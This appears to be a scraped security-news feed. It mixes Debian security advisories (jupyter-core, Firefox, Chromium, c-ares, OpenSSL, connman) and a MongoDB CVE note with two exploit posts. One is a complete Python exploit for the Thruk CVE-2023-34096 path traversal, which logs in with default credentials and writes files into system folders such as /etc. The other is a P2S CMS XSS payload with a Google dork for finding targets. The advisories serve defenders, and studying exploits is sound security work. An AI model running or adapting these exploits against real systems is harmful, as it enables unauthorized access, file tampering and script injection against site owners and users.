Debian Linux Security Advisory 5422-1 - It was discovered that jupyter-core, the core common functionality for Jupyter projects, could execute arbitrary code in the current working directory while loading configuration files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5422-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 09, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : jupyter-coreCVE ID         : CVE-2022-39286Debian Bug     : 1023361It was discovered that jupyter-core, the core common functionality forJupyter projects, could execute arbitrary code in the current workingdirectory while loading configuration files.For the stable distribution (bullseye), this problem has been fixed inversion 4.7.1-1+deb11u1.We recommend that you upgrade your jupyter-core packages.For the detailed security status of jupyter-core please refer toits security tracker page at:https://security-tracker.debian.org/tracker/jupyter-coreFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSC094ACgkQO1LKKgqv2VQqmAf7BuaSZZoh8XI6RUFVbwi0NSsFUVY0x4lLIUr49M+qpZoRsUxLAqjeAsqAnLONXNZeqRmL/lCL/4dZ1BvP0D3lW7DaKzP25D9HhamuBMo/8Uvcn/jKhTW+SwXG5qzJoN1XrHHN9ye/yFUd3em+wgZwlOUWVRAICTmnw0s1IA2Z1Urx5qIOD0wphuPwg2QeluVVXlhUDVm8fd0EHi2LupnukIfe4BnPvKtPPrt6wNYxiUEICrXsf21HV/xq07J3MmyJwNmJKw4+GhqDVhcbLW/tWwp51ux+nHXoHOR2GVILwVW1+qp24BOo6ecqG2VldohIy0T8eMebBH9ojICKHT+bpA===S5gL-----END PGP SIGNATURE-----

Debian Security Advisory 5422-1

Thruk Monitoring Web Interface versions 3.06 and below are affected by a path traversal vulnerability.

    # Exploit Title: Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06# Date: 08-Jun-2023# Exploit Author: Galoget Latorre (@galoget)# CVE: CVE-2023-34096 (Galoget Latorre)# Vendor Homepage: https://thruk.org/# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h# Affected Versions: <= 3.06# Language: Python 3.x# Tested on:#  - Ubuntu 22.04.5 LTS 64-bit#  - Debian GNU/Linux 10 (buster) 64-bit#  - Kali GNU/Linux 2023.1 64-bit#  - CentOS GNU/Linux 8.5.2111 64-bit#!/usr/bin/python3# -*- coding:utf-8 -*-import sysimport warningsimport requestsfrom bs4 import BeautifulSoupfrom termcolor import cprint# Usage: python3 exploit.py <target.site># Example: python3 exploit.py http://127.0.0.1/thruk/# Disable warningswarnings.filterwarnings('ignore')# Set headersheaders = {    "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"}def banner():    """    Function to print the banner    """    banner_text = """ __     __     __   __  __  __      __        __   __   __  /  \\  /|_  __   _) /  \\  _)  _) __   _) |__| /  \\ (__\\ /__  \\__ \\/ |__     /__ \\__/ /__ __)     __)    | \\__/  __/ \\__)                                                                Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06Exploit & CVE Author: Galoget Latorre (@galoget)LinkedIn: https://www.linkedin.com/in/galoget"""    print(banner_text)def usage_instructions():    """    Function that validates the number of arguments.    The application MUST have 2 arguments:    - [0]: Name of the script    - [1]: Target URL (Thruk Base URL)    """    if len(sys.argv) != 2:        print("Usage: python3 exploit.py <target.site>")        print("Example: python3 exploit.py http://127.0.0.1/thruk/")        sys.exit(0)def check_vulnerability(thruk_version):    """    Function to check if the recovered version is vulnerable to CVE-2023-34096.    Prints additional information about the vulnerability.    """    try:        if float(thruk_version[1:5]) <= 3.06:            if float(thruk_version[4:].replace("-", ".")) < 6.2:                cprint("[+] ", "green", attrs=['bold'], end = "")                print("This version of Thruk is ", end = "")                cprint("VULNERABLE ", "red", attrs=['bold'], end = "")                print("to CVE-2023-34096!")                print(" |  CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")                print(" |  GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")                print(" |  CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")                print(" |  CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")                print(" |  Thruk Changelog: https://www.thruk.org/changelog.html")                print(" |  Fixed version: 3.06-2+")                print("")                return True            else:                cprint("[-] ", "red", attrs=['bold'], end = "")                print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")                return False    except:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("There was an error parsing Thruk's version.\n")        return Falsedef get_thruk_version():    """    Function to get Thruk's version via web scraping.    It also verifies the title of the website to check if the target is a Thruk instance.    """    response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)    html_soup = BeautifulSoup(response.text, "html.parser")    if "<title>Thruk Monitoring Webinterface</title>" not in response.text:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")        sys.exit(-1)    else:        # Extract version anchor tag        version_link = html_soup.find_all("a", {"class": "link text-sm"})        if len(version_link) == 1 and version_link[0].has_attr('href'):            thruk_version = version_link[0].text.strip()            cprint("[+] ", "green", attrs=['bold'], end = "")            print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")            return thruk_version        else:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("There was an error retrieving Thruk's version.")            sys.exit(-1)def get_error_info():    """    Function to cause an error in the target Thruk instance and collect additional information via web scraping.    """    # URL that will cause an error    error_url = target + "//cgi-bin/login.cgi"    # Retrieve Any initial Cookies    error_response = requests.get(error_url,                                  headers=headers,                                  allow_redirects=False,                                  verify=False,                                  timeout=10)    cprint("[*] ", "blue", attrs=['bold'], end = "")    print("Trying to retrieve additional information...\n")    try:        # Search for the error tag        html_soup = BeautifulSoup(error_response.text, "html.parser")        error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text        if len(error_report) > 0:            # Print Error Info            error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]            cprint("[+] ", "green", attrs=['bold'], end = "")            print("Recovered Information: \n")            parsed_error_report = error_report.split("\n")            for error_line in parsed_error_report:                print(f"     {error_line}")    except:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("No additional information available.\n")def get_thruk_session_auto_login():    """    Function to login into the Thruk instance and retrieve a valid session.    It will use default Thruk's credentials available here:    - https://www.thruk.org/documentation/install.html        Change credentials if required.    """    # Default Credentials - Change if required    username = "thrukadmin" # CHANGE ME    password = "thrukadmin" # CHANGE ME    params = {"login": username, "password": password}    cprint("[*] ", "blue", attrs=['bold'], end = "")    print(f"Trying to autenticate with provided credentials: {username}/{password}\n")    # Define Login URL    login_url = "cgi-bin/login.cgi"    session = requests.Session()    # Retrieve Any initial Cookies    session.get(target, headers=headers, allow_redirects=True, verify=False)    # Login and get thruk_auth Cookie    session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)    # Get Cookies as dictionary    cookies = session.cookies.get_dict()    # Successful Login    if cookies.get('thruk_auth') is not None:        cprint("[+] ", "green", attrs=['bold'], end = "")        print("Successful Authentication!\n")        cprint("[+] ", "green", attrs=['bold'], end = "")        print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")        return session    # Failed Login    else:        if cookies.get('thruk_message') == "fail_message~~login%20failed":            cprint("[-] ", "red", attrs=['bold'], end = "")            print("Login Failed, check your credentials.")            sys.exit(401)def cve_2023_34096_exploit_path_traversal(logged_session):    """    Function that attempts to exploit the Path Traversal Vulnerability.    The exploit will try to upload a PoC file to multiple common folders.    This to prevent permissions errors to cause false negatives.    """    cprint("[*] ", "blue", attrs=['bold'], end = "")    print("Trying to exploit: ", end = "")    cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])    # Define Upload URL    upload_url = "cgi-bin/panorama.cgi"    # Absolute paths    common_folders = ["/tmp/",                      "/etc/thruk/plugins/plugins-enabled/",                      "/etc/thruk/panorama/",                      "/etc/thruk/bp/",                      "/etc/thruk/thruk_local.d/",                      "/var/www/",                      "/var/www/html/",                      "/etc/",    ]    # Upload PoC file to each folder    for target_folder in common_folders:        # PoC file extension is jpg due to regex validations of Thruk.        # Nevertheless this issue can still cause damage in different ways to the affected instance.        files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}        data = {"task": "upload",                "type": "image",                "location": f"backgrounds/../../../..{target_folder}"        }        upload_response = logged_session.post(target + upload_url,                                    data=data,                                    files=files,                                    headers=headers,                                    allow_redirects=False,                                    verify=False)        try:            upload_response = upload_response.json()            if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:                cprint("[+] ", "green", attrs=['bold'], end = "")                print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")            elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":                cprint("[-] ", "red", attrs=['bold'], end = "")                print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")            else:                cprint("[-] ", "red", attrs=['bold'], end = "")                print("File upload failed.\n")        except:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("File upload failed.\n")if __name__ == "__main__":    banner()    usage_instructions()    # Change this with the domain or IP address to attack    if sys.argv[1] and sys.argv[1].startswith("http"):        target = sys.argv[1]    else:        target = "http://127.0.0.1/thruk/"    # Prepare Base Target URL    if not target.endswith('/'):        target += "/"    cprint("[+] ", "green", attrs=['bold'], end = "")    print(f"Target URL: {target}\n")    # Get Thruk version via web scraping    scraped_thruk_version = get_thruk_version()    # Send a request that will generate an error and collect extra info    get_error_info()    # Check if the instance is vulnerable to CVE-2023-34096    vulnerable_status = check_vulnerability(scraped_thruk_version)    if vulnerable_status:        cprint("[+] ", "green", attrs=['bold'], end = "")        print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")        # Confirm exploitation        option = input("\nChoice (Y/N): ").lower()        print("")        if option == "y":            cprint("[*] ", "blue", attrs=['bold'], end = "")            print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")            # Login into Thruk instance            valid_session = get_thruk_session_auto_login()            # Exploit Path Traversal Vulnerability            cve_2023_34096_exploit_path_traversal(valid_session)        elif option == "n":            cprint("[*] ", "blue", attrs=['bold'], end = "")            print("No exploitation attempts were performed, Goodbye!\n")            sys.exit(0)        else:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("Unknown option entered.")            sys.exit(1)    else:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")        sys.exit(2)

Thruk Monitoring Web Interface 3.06 Path Traversal

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

**P2S CMS 0.1 Cross Site Scripting**

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

**P2S CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,354)
*   Arbitrary (16,067)
*   BBS (2,859)
*   Bypass (1,694)
*   CGI (1,024)
*   Code Execution (7,157)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,317)
*   DoS (23,189)
*   Encryption (2,363)
*   Exploit (51,175)
*   File Inclusion (4,195)
*   File Upload (955)
*   Firewall (821)
*   Info Disclosure (2,720)
*   Intrusion Detection (884)
*   Java (3,002)
*   JavaScript (841)
*   Kernel (6,577)
*   Local (14,393)
*   Magazine (586)
*   Overflow (12,614)
*   Perl (1,423)
*   PHP (5,124)
*   Proof of Concept (2,302)
*   Protocol (3,567)
*   Python (1,509)
*   Remote (30,515)
*   Root (3,556)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,854)
*   Shell (3,163)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,234)
*   TCP (2,394)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,597)
*   Web (9,571)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,693)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,979)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,758)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (344)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,866)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,370)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,652)
*   UNIX (9,246)
*   UnixWare (186)
*   Windows (6,557)
*   Other

P2S CMS 0.1 Cross Site Scripting

MongoDB Ops Manager Diagnostics Archive may not redact sensitive PEM key file password app settings. Archives do not include the PEM files themselves. This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and MongoDB Ops Manager v6.0 prior to 6.0.12

CVE-2023-0342: Ops Manager Server Changelog — MongoDB Ops Manager 6.0

Debian Linux Security Advisory 5421-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5421-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-34414 CVE-2023-34416Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bullseye), these problems have been fixed inversion 102.12.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSA8KsACgkQEMKTtsN8TjYSqBAAqZeT5wOx739rLds++dr7nw2AsHTokRdcQskPewJwqSOYY8ErKQbY5Crfre/0OXsuaq/gy0Y2+7LeAManTLl4uOzVz2wBEjWFYQ4ptLG543PzPWpbwFTlcx3HVdmtAMUrg65/eEk+m/wMFCfU3ydL3SSuT1EMjRMXGm39y2ocT3JK+CAME0ajxyHkFIbz+UjvUXnpbXTeA++O0Caexic5ACAi3GPtmFSJI1vtwI9nCCNQnQMbIWdaQ8ANOm1U1FT5Wli71M2YE8LVGIaGsavKR62DRa0Hr6omHGbmsXNRCclM6lrx7vaAt274IOghNCXYQzSd58nHw6TlshcKn7ScMpNmwYhmsSYbquk57pSNLxVU2cJEQo8V6QqoskbhnkiY0rSBKWWBzB5HiUABgYD3HHGedDJF3jhNQQNV8O0FhZq2NCCC3BDw/VdeRz2fF2LeQwc4XMP6rmJSNkc2PFETT0cKRVS4EpLJMth6lk8HVQfTeBZe0hqI8W7fwQ/T4LJa55KOFEct6p5eNG7aq5he3zOWH0BA2WwuvDA/y8M7hIUxifP92RhsevIMQDrwaMGwRb6ejme1ChHUrax+hGtBqR1ti6fNoT1jRqmJs+15JKMLQwArrWivLVNhnfMh3Tb9UEE/VdV6dKmenuCFBx5wJIMRT83wSuCIcYVtaznfZ88==wKyc-----END PGP SIGNATURE-----

Debian Security Advisory 5421-1

Debian Linux Security Advisory 5420-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5420-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3079Multiple security issues were discovered in Chromium, whichcould result in the execution of arbitrary code, denial of serviceor information disclosure.For the stable distribution (bullseye), this problem has been fixed inversion 114.0.5735.106-1~deb11u1.For the upcoming stable distribution (bookworm), these problems havebeen fixed in version 114.0.5735.106-1~deb12u1We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSAuzkACgkQEMKTtsN8TjYkHw//YSLfIYssjDXV6CkcW1SO+qGwPwB8/57wUJEpA8x73DjUhbUgatpbyuaKHWYX7knrTT7PG1nHgRaBWkWp+TFfpjsOEo/C6guIgwkYQ6GPLePLJe7RwWI2NxzH+o9GgqZhzJ34BC7YQd2FWKGe59cYE26TAqk8R7rSTi9PnPtZqO5Y7BlKo8g8WjJhIYLG8N58zFKxDQxt6XKwkKVJIIbImAb5qOGpThSB05vuan36EyX8UZWHoj5ao+z1gUL9HbSkznfEZUYpHIOf2VNcrI3DCrxJejESmtWaeL8XPC7PlVEgfOZoFIvdMo9ZY6hLUOGe1uWeozTSBELyRvvXdWRiSlmY1W4AysD5/3cOppCbyR+eixUgUMhCLNcYs8gHut/MFILMYMAlegDScNp3r4kZBSjyXX+ftEoagBSSHw0AFXswj8wb5adbalrWybH8Ky44BT2G3cd5tk1GAn/hh3WMoq+lOmB498UmTSuQe9PV+4FRdbYSPlIBotnmAQcASLeJLutlO2qjqf1DTO+mRA0MciIzoIsPjNNI9LxnWoPuMhsZb4KhuxJUfpSDWVoHDbqc7cTpzRTgJ0UnuTbNNUK6puDHhb3427u1T+tsAw0jEeYpg/0PhhRZfptz4RF9iFFFokKvpBdFOlAo643XD6yFCQjKfMDyJ5xdmUu2Ce1r2fw==HC9u-----END PGP SIGNATURE-----

Debian Security Advisory 5420-1

Debian Linux Security Advisory 5419-1 - Two vulnerabilities were discovered in c-ares, an asynchronous name resolver library.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5419-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : c-aresCVE ID         : CVE-2023-31130 CVE-2023-32067Debian Bug     :Two vunerabilities were discovered in c-ares, an asynchronous nameresolver library:CVE-2023-31130    ares_inet_net_pton() is found to be vulnerable to a buffer underflow    for certain ipv6 addresses, in particular "0::00:00:00/2" was found    to cause an issue. c-ares only uses this function internally for    configuration purposes, however external usage for other purposes may    cause more severe issues.CVE-2023-32067    Target resolver may erroneously interprets a malformed UDP packet    with a lenght of 0 as a graceful shutdown of the connection, which    could cause a denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 1.17.1-1+deb11u3.We recommend that you upgrade your c-ares packages.For the detailed security status of c-ares please refer toits security tracker page at:https://security-tracker.debian.org/tracker/c-aresFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSAEaIACgkQO1LKKgqv2VRDGQf/dYEAeHJPGUsjOZqvhLvgCeKqgBuB0N3fz5Xpm/JmMmCoCihipy5xCCtAFnUifM+ERPjhkHPgerZEKPW9gSI/RXcbefRYu2sTfvaC0td3Gs1ZyGB4A3RrL6fCwEeMU3jYnfDZBfJpzmCBDx7HhYPx/IlKLWThEFvqvHZxTiKehelKdjV/VhOh9fvOqawPbrMt+DFeBabpN9Hbm1mqkDmeKLfeLzwGSXsSEKGpYPoz+6BCizFgppTHGIifWeBRdbcB0OA/qDD540ZLMRXCq53xmcU7qe8yDsdMuflX5ANIJ4iyG2pDYO3uwxcfCkDOofiTQdumVCGB6BZYVeucTc0dWg==4/KK-----END PGP SIGNATURE-----

Debian Security Advisory 5419-1

Debian Linux Security Advisory 5418-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5418-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 03, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-2929 CVE-2023-2930 CVE-2023-2931 CVE-2023-2932  
                 CVE-2023-2933 CVE-2023-2934 CVE-2023-2935 CVE-2023-2936  
                 CVE-2023-2937 CVE-2023-2938 CVE-2023-2939 CVE-2023-2940  
                 CVE-2023-2941

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the stable distribution (bullseye), these problems have been fixed in  
version 114.0.5735.90-2~deb11u1.

For the upcoming stable distribution (bookworm), these problems have  
been fixed in version 114.0.5735.90-2~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmR7SQoACgkQEMKTtsN8  
TjZJjxAAj/KHxjAYEEM1vGexQutPWTI4WJkxPh2Fszxv0HTa3tUuf2DqVpMvBNVr  
sHgSrkSIyTAvsLZsKvM6pc+RKNqP5x6XpFBN1g/Nv4hkJYHV8flFwyA6AGPkAozm  
uD3fCsIuh8ShqCTMwFF4LCA4dUIYvALA0UNQXJexB8plaiDJKaAN5GQxRCq9eYRM  
bc4OqdHeISfG30M+fIOWmKE6mLkC55ksfb9WbDUtsMNHvNrJdt3ki2K9yipTmtsk  
o+0MkV8cmE46hF7gC7KhbE/l9h8OLf/FHQyniEJEFNQ5L3S+bCJV0iFviO5PDjx4  
sooied9tWmQeq2X/ldykapQBWxQuQ0P2LDQgOvMiC81LGWAeJ39vEHpXew/DL0zt  
ACufvKSawqLR4Ckc/iNPAfFg9KECg5X0g6IwCWP/s169KibNdzm00sZ1fmw62Ewr  
N8szHvii0H+7PVpPWuNPb6FZUntC3c3tUwB1w3qnOKTwbLFGzsENQK4hKJudr04t  
sCQ+3S1o1Vvtxy6yhenuzuY4IhgQGGFdELhIP3Wsvg8Rmgj32VKmjPxwZz/cYjYK  
KpmTs7P0+NLegzokaIGeTSWxh2buzeNYnOIJpF130xw99I1f/RsizzN3Itb/3HEx  
wAeyv7DuLe3MNvk8+4WRKrn9aqcr8HPWWCBFzbqtkPv6W1ykvis=gkZS  
-----END PGP SIGNATURE-----

Debian Security Advisory 5418-1

Debian Linux Security Advisory 5417-1 - Multiple vulnerabilities have been discovered in OpenSSL, a Secure Sockets Layer toolkit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5417-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 31, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssl  
CVE ID         : CVE-2023-0464 CVE-2023-0465 CVE-2023-0466 CVE-2023-2650  
Debian Bug     : 1034720

Multiple vulnerabilities have been discovered in OpenSSL, a Secure  
Sockets Layer toolkit.

CVE-2023-0464

    David Benjamin reported a flaw related to the verification of X.509  
    certificate chains that include policy constraints, which may result  
    in denial of service.

CVE-2023-0465

    David Benjamin reported that invalid certificate policies in leaf  
    certificates are silently ignored. A malicious CA could take  
    advantage of this flaw to deliberately assert invalid certificate  
    policies in order to circumvent policy checking on the certificate  
    altogether.

CVE-2023-0466

    David Benjamin discovered that the implementation of the  
    X509_VERIFY_PARAM_add0_policy() function does not enable the check  
    which allows certificates with invalid or incorrect policies to pass  
    the certificate verification (contrary to its documentation).

CVE-2023-2650

    It was discovered that processing malformed ASN.1 object identifiers  
    or data may result in denial of service.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.1.1n-0+deb11u5.

We recommend that you upgrade your openssl packages.

For the detailed security status of openssl please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmR3XbdfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q57RAAnVKJS02ib/Uke98Kia//N7JAweY3jZ5IGluzGqms6di2Z9+1qW/qbjI+  
tGq2HdEd/ujN1+8hLciZN9U12Otkrt+Z//TvIJDBNd12sAiK6w5efVlIhESOW8z+  
nXxDBNsZv4ocqFcdWlXTaE1JQBd4MGULHsrItoczMwL1iiHfuvOxS7XqrttfGK2K  
WlnE3/uzmKJup77u4OnHxicTEaUGesV8fvv2uoI+gxkiQPZbEDLBINClDlhSgAae  
vMhrZrYLwS6vNZOG4fvDheHkd+3jO1YCv+742YeZbEfa6o3RXYGvLzSRNo5MhR/K  
N2/pxTHsRFaPlAxjys1UNGsZsIK7eZR0jyVRrF3PkbMgI4SVEyoqsI19i+viGoHY  
Ih6YkrSFxmQfK+1XDXS4RFOgVN900h4D/V/13udiswHShaFVsf4wu9SagmJtzR7X  
TzsphwZAbvxcqhaKdURgHoXaokMRxlO7vFijB1//Q+/uJJrkpLb+XTkN+SnujCSA  
48tAs3vnv9fki14+B6IQ9Tyg/Obhxk+z5Xb3W6H6xO1IfdmCibBvF77O8Q8uKIhD  
p3yhZeZY0VanKJMxquC3Yi0Ja6wbcJuww33/9/pqpTEdaoOnxb/wXNU0x2wIRBUL  
7IzNcmgVpQ1P3UhM58WZGOUS/0+IAtGfuEzZJiuWWKyV3hFvIEs=XKMH  
-----END PGP SIGNATURE-----

Debian Security Advisory 5417-1

Debian Linux Security Advisory 5416-1 - It was discovered that there was a potential buffer overflow and denial of service vulnerability in the gdhcp client implementation of connman, a command-line network manager designed for use on embedded devices.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5416-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuMay 31, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : connmanCVE ID         : CVE-2023-28488Debian Bug     : 1034393It was discovered that there was a potential buffer overflow and denialof service vulnerabilty in the gdhcp client implementation of connman, acommand-line network manager designed for use on embedded devices.For the stable distribution (bullseye), this problem has been fixed inversion 1.36-2.2+deb11u2.We recommend that you upgrade your connman packages.For the detailed security status of connman please refer toits security tracker page at:https://security-tracker.debian.org/tracker/connmanFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmR2MiEACgkQO1LKKgqv2VQR/QgApr1QeIQIfrW7WfJYD0C0xVXhLuO2X1D2yxgUjHIEChpaWu7ogcOh3dBNQkZAWmsWqFs/TnCdrltt8txJHfBz/PYkzPjwBN/CHZjW2t7HxCZqmA3tnuHGtzotJRQD5G2d1W5ycJUL88ZWar0GKn98nwdsxTCRy8mi157Gy588pTrQbS+P9HtTK0I0eUysoupKoEb2HGgn6nlpQJoRWqJnqkv7FmB6jOecP4ivAnmjwiciwMztIvggsJ+yjYns6BXLzNQyU5T0ch2a2Mduddm4iR9Ax7KV8fv8+UIEEzwp+2tCKctV/yAmQodgK3LJsgIkoFMJBMjevuozcp8o6QNbZw=åQs-----END PGP SIGNATURE-----

Tag

#debian